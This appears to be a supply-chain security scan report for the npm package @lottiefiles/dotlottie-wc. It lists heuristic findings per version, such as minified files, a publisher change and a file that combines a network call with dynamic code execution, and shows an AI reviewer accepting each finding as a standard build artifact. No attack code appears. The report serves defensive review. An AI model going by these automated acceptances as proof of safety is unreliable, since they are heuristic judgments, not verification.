@lottiefiles/dotlottie-wc
Supply chain provenance
Status for the latest visible version.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/dotlottie-Cn4v_pQB-CBtBMv4n.js | AI (source-diff): Minified dotlottie-web WASM binding; standard build output for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-BtTeeiEn.js | AI (source-diff): Minified dotlottie-web bundle; standard build output for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-MOs0qH2M.js | AI (source-diff): Minified dotlottie-web bundle with recognizable @lottiefiles/dotlottie-web internals; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-BMnS_qxa.js | AI (source-diff): Standard minified bundle with source map; consistent with tsdown build output for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-BLkQfkLV.js | AI (source-diff): Standard bundled/minified dist output for this package; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/dist-CDWQCGVs.js | AI (source-diff): Standard minified bundle output for this package; SLSA provenance confirms CI/CD build integrity. | ai | |
| source-diff | obfuscated-file:dist/dist-BnVItZne.js | AI (source-diff): Minified dotlottie-web bundle with WASM; standard build artifact for this package. | ai | |
| source-diff | net-exec-file:dist/chunk-B6AP7WKV.js | AI (source-diff): WASM loader bundle for dotlottie-web; fetch+WebAssembly execution is the documented runtime pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-DHjsgXjJ.js | AI (source-diff): Minified dotlottie-web bundle with recognizable @lottiefiles/dotlottie-web internals; expected build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-CDsU-l1k.js | AI (source-diff): Standard minified bundle with accompanying source map; readable Babel/WASM glue code, not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/dotlottie-DBBPxC2A-By124qvu.js | AI (source-diff): Minified dotlottie-web WASM binding code; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-XO1b9DBD.js | AI (source-diff): Minified dotlottie-web bundle with inline Worker; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-CKe9q9bt.js | AI (source-diff): Minified dotlottie-web WASM binding bundle; standard build artifact matching declared dependency @lottiefiles/[email protected]. | ai | |
| source-diff | obfuscated-file:dist/dist-DO_wn7qf.js | AI (source-diff): Minified dotlottie-web bundle; standard build artifact, content matches expected library code. | ai | |
| source-diff | obfuscated-file:dist/decorate-C0oFmnNg.js | AI (source-diff): Minified Lit framework code; standard build artifact for this web component package. | ai | |
| phantom-deps | phantom-dep:@lottiefiles/dotlottie-web | AI (phantom-deps): Same-org dep bundled into dist; phantom-dep heuristic is a stable false positive for this package. | ai | |
| phantom-deps | phantom-dep:lit | AI (phantom-deps): lit is bundled into dist output; not directly imported in source but legitimately used as a runtime dep. | ai | |
| source-diff | obfuscated-file:dist/dist-GOJJVOuh.js | AI (source-diff): Standard minified dotlottie-web bundle; expected build artifact for this package. | ai | |
| source-diff | obfuscated-file:dist/decorate-DwnJ77rs.js | AI (source-diff): Standard minified Lit framework output with license headers; expected build artifact for this package. | ai | |
| provenance | slsa-provenance | AI (provenance): Package consistently publishes via CI/CD with SLSA provenance; stable pattern for this org. | ai | |
| provenance | publisher-changed | AI (provenance): Transition to GitHub Actions publisher is consistent with SLSA provenance attestation from official repo. | ai |
Versions (showing 47 of 47)
| Version | Deps | Published |
|---|---|---|
| 0.9.16 | 2 / 6 | |
| 0.9.15 | 2 / 6 | |
| 0.9.14 | 2 / 6 | |
| 0.9.13 | 2 / 6 | |
| 0.9.12 | 2 / 6 | |
| 0.9.11 | 2 / 6 | |
| 0.9.10 | 2 / 6 | |
| 0.9.9 | 2 / 6 | |
| 0.9.8 | 2 / 6 | |
| 0.9.7 | 2 / 6 | |
| 0.9.6 | 2 / 6 | |
| 0.9.5 | 2 / 6 | |
| 0.9.4 | 2 / 6 | |
| 0.9.3 | 2 / 6 | |
| 0.9.2 | 2 / 6 | |
| 0.9.1 | 2 / 6 | |
| 0.9.0 | 2 / 6 | |
| 0.8.16 | 2 / 7 | |
| 0.8.15 | 2 / 7 | |
| 0.8.14 | 2 / 7 | |
| 0.8.13 | 2 / 7 | |
| 0.8.11 | 2 / 7 | |
| 0.8.10 | 2 / 7 | |
| 0.8.9 | 2 / 7 | |
| 0.8.8 | 2 / 7 | |
| 0.8.7 | 2 / 7 | |
| 0.8.6 | 2 / 7 | |
| 0.8.5 | 2 / 7 | |
| 0.8.4 | 2 / 7 | |
| 0.8.3 | 2 / 7 | |
| 0.8.2 | 2 / 7 | |
| 0.8.1 | 2 / 7 | |
| 0.8.0 | 2 / 7 | |
| 0.7.7 | 2 / 7 | |
| 0.7.6 | 2 / 7 | |
| 0.7.5 | 2 / 7 | |
| 0.7.4 | 2 / 7 | |
| 0.7.3 | 2 / 7 | |
| 0.7.2 | 2 / 7 | |
| 0.7.1 | 2 / 7 | |
| 0.7.0 | 2 / 7 | |
| 0.6.4 | 2 / 7 | |
| 0.6.3 | 2 / 7 | |
| 0.6.2 | 2 / 7 | |
| 0.6.1 | 2 / 7 | |
| 0.6.0 | 2 / 7 | |
| 0.5.3 | 2 / 7 |
v0.9.16
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.15
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.14
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.13
2 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.11
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.10
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.9
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.8
4 findingsThis version was published by a different npm account than previous versions on 2026-03-17. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.7
4 findingsThis version was published by a different npm account than previous versions on 2026-03-13. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.6
5 findingsThis version was published by a different npm account than previous versions on 2026-03-12. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.5
5 findingsThis version was published by a different npm account than previous versions on 2026-03-10. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.4
4 findingsThis version was published by a different npm account than previous versions on 2026-02-25. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.3
4 findingsThis version was published by a different npm account than previous versions on 2026-02-23. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.2
4 findingsThis version was published by a different npm account than previous versions on 2026-02-18. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.1
4 findingsThis version was published by a different npm account than previous versions on 2026-02-17. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.0
4 findingsThis version was published by a different npm account than previous versions on 2026-02-16. This could indicate a legitimate maintainer transition or an account compromise.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.16
2 findingsThis version was published by a different npm account than previous versions on 2026-02-12. This could indicate a legitimate maintainer transition or an account compromise.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.15
2 findingsThis version was published by a different npm account than previous versions on 2026-02-05. This could indicate a legitimate maintainer transition or an account compromise.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.14
2 findingsThis version was published by a different npm account than previous versions on 2026-01-14. This could indicate a legitimate maintainer transition or an account compromise.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.13
2 findingsThis version was published by a different npm account than previous versions on 2025-12-25. This could indicate a legitimate maintainer transition or an account compromise.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.11
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.10
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.9
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.8
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.7
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.6
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.5
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.2
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.1
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.7
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.6
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.5
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.2
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.1
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.0
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.2
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.1
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.0
2 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.5.3
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.